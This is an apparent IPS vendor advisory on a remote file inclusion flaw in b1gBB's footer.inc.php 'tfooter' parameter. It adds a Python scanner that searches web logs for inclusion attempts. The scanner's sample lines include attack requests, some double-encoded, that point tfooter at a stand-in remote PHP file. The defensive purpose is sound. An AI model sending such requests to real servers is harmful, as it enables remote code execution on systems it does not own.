B1GBB.Footer.Inc.PHP.File.Inclusion
Description
B1G Bulletin Board (b1gBB) has a remote file include vulnerability. A remote attacker could execute arbitrary script code on the web server with the privileges of the server. This can be done via a specially crafted URL request to the 'footer.inc.php' script, using the 'tfooter' parameter to specify a malicious PHP file from a remote system.
Affected Products
B1G Bulletin Board (b1gBB) version 2.24.0 and prior.
Impact
System compromise, remote script execution.
Recommended Actions
Currently we are not aware of any officially supplied fix for this issue.
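With no vendor fix available, reviewing web server access logs for requests that match the description above is one practical check. The following is an added example, not part of the original advisory: it flags requests to 'footer.inc.php' whose 'tfooter' value decodes to a URL or stream wrapper rather than a local path. The combined log format, the /b1gbb/ install path and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: Apache/nginx "combined" access-log format.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')
# A scheme:// prefix or data: wrapper means the value is not a local template path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:)', re.IGNORECASE)

# Constructed sample lines (documentation addresses, reserved .example domain).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2000:10:01:02 +0000] "GET /b1gbb/footer.inc.php?tfooter=http://files.example/f.txt HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [01/Jan/2000:10:01:05 +0000] "GET /b1gbb/footer.inc.php?tfooter=%2568ttp%253A%252F%252Ffiles.example%252Ff.txt HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [01/Jan/2000:10:02:00 +0000] "GET /b1gbb/footer.inc.php?tfooter=templates/footer.htm HTTP/1.1" 200 900 "-" "-"',
    '198.51.100.4 - - [01/Jan/2000:10:02:03 +0000] "GET /b1gbb/index.php?ref=http://www.example.org/ HTTP/1.1" 200 4096 "-" "-"',
]

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so an encoded scheme is still recognised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_tfooter(target):
    """Return the decoded tfooter value if it points at a remote resource, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("footer.inc.php"):
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == "tfooter":
            value = decode_fully(value)  # parse_qsl already decoded one layer
            if REMOTE_RE.match(value):
                return value
    return None

def scan(lines):
    """Return (client_ip, decoded_tfooter) for every flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        value = suspicious_tfooter(m.group("target")) if m else None
        if value is not None:
            hits.append((m.group("ip"), value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"possible b1gBB tfooter inclusion attempt from {ip}: {value}")
```

A hit shows only that an attempt was logged; whether the include succeeded has to be confirmed on the host.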
Coverage
IPS (Regular DB)
IPS (Extended DB)